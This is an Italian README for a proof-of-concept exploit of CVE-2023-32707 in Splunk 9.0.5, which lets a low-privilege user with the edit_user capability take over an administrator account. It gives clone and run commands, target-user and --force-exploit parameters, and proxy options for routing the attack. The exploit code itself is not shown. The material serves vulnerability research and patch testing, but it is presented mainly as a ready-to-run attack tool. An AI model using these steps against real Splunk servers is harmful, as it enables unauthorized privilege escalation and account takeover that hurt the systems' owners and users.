
Un exploit POC migliorato basato sul CVE segnalato su exploitdb
Un POC exploit migliorato basato sulla CVE segnalata su exploitdb
Exploit Title: Splunk 9.0.5 - Admin Account Takeover CVE: CVE-2023-32707
Questo script consente di sfruttare una vulnerabilità in Splunk 9.0.5, portando all'acquisizione dell'account amministratore. L'exploit sfrutta un utente con privilegi bassi che possiede la capacità edit_user per escalation dei privilegi.
pip3 install -r requirements.txt):
Clona il repository:
git clone https://github.com/9xN/CVE-2023-32707.git
cd CVE-2023-32707
Esegui lo script con i parametri richiesti:
python3 exploit.py --host <splunk_host> --username <splunk_username> --password <splunk_password> --target-user <target_user> --force-exploit
Sostituisci <splunk_host>, <splunk_username>, <splunk_password> e <target_user> con i dettagli del tuo server Splunk.
--host: Host Splunk o indirizzo IP (obbligatorio)--username: Nome utente Splunk (obbligatorio)--password: Password Splunk (obbligatorio)--target-user: Utente target per l'acquisizione dell'account (obbligatorio)--force-exploit: Forza l'exploit (opzionale)--proxy-file: File contenente le impostazioni del proxy (opzionale)Per utilizzare proxy, specifica --proxy-file con il percorso di un file contenente le impostazioni del proxy.
Esempio:
python3 exploit.py --host <splunk_host> --username <splunk_username> --password <splunk_password> --target-user <target_user> --force-exploit --proxy-file proxies.txt